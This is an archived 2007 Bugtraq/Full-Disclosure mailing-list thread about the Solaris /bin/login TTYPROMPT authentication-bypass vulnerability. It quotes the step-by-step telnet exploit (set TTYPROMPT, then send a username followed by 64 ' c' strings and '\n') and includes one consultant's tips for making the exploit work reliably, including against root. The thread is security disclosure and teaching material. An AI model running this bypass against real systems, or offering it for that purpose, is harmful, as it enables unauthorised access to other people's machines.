lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [day] [month] [year] [list]
Message-ID: <096A04F511B7FD4995AE55F13824B833212721@banneretcs1.local.banneretcs.com>
Date: Thu, 22 Feb 2007 12:45:25 -0500
From: "Roger A. Grimes" <roger@...neretcs.com>
To: "Thierry Zoller" <Thierry@...ler.lu>,
	<bugtraq@...urityfocus.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Solaris telnet vulnberability - how many on
	your network?

Fun ole exploit.

Of course, it doesn't have to be C's. I use numbers 1-9 and 0, repeated
so its easier to count 64 characters. It can be nearly any character, as
long as you have the spaces in between. It doesn't even have to be 64
characters all the time, but it normally has to be 64 or slightly more.
I've even messed up on the end portion, putting a / slash instead of a
backward slash, because I'm a Windows guy of course. It works every time
the way it is said below (with any character) though, but it is
forgiving at times. I've taugh this exploit hundreds of times to
students in Foundstone's Ultimate Hacking Expert class, and most
students mess it up the first time and it still often works. And of
course, you can use root if root is not prevented from doing remote
telnet logons.

Note, however, if you mess it up the first time, exit all the way back
out of telnet, and get back in, to begin again.

Roger

*******************************************************************
*Roger A. Grimes, Senior Security Consultant
*Microsoft Application Consulting and Engineering (ACE) Services  
*http://blogs.msdn.com/ace_team/default.aspx
*CPA, CISSP, MCSE: Security (2000/2003/MVP), CEH, yada...yada...
*email: roger@...neretcs.com or rogrim@...rosoft.com
*******************************************************************


-----Original Message-----
From: Thierry Zoller [mailto:Thierry@...ler.lu] 
Sent: Wednesday, February 21, 2007 1:58 PM
To: bugtraq@...urityfocus.com
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re[2]: Solaris telnet vulnberability - how many on your
network?

Dear Marc,

This is hilarious, should there ever be a Top10 of the most weird bugs,
this surely is one of them, repost for pure amusement :

  Solaris 2.6, 7, and 8 /bin/login has a vulnerability involving the
environment variable TTYPROMPT.  This vulnerability has already been
reported to BugTraq and a patch has been released by Sun.
  However, a very simple exploit, which does not require any code to be
compiled by an attacker, exists.  The exploit requires the attacker to
simply define the environment variable TTYPROMPT to a 6 character
string, inside telnet. I believe this overflows an integer inside login,
which specifies whether or not the user has been authenticated (just a
guess).
Once connected to the remote host, you must type the username, followed
by
64 " c"s, and a literal "\n".  You will then be logged in as the user
without any password authentication.  This should work with any account
except root (unless remote root login is allowed).

Example:

coma% telnet
telnet> environ define TTYPROMPT abcdef
telnet> o localhost

SunOS 5.8

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c
c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n Last
login: whenever $ whoami bin


--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45  2E57 28B3 75DD 0AC6 F1C7

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ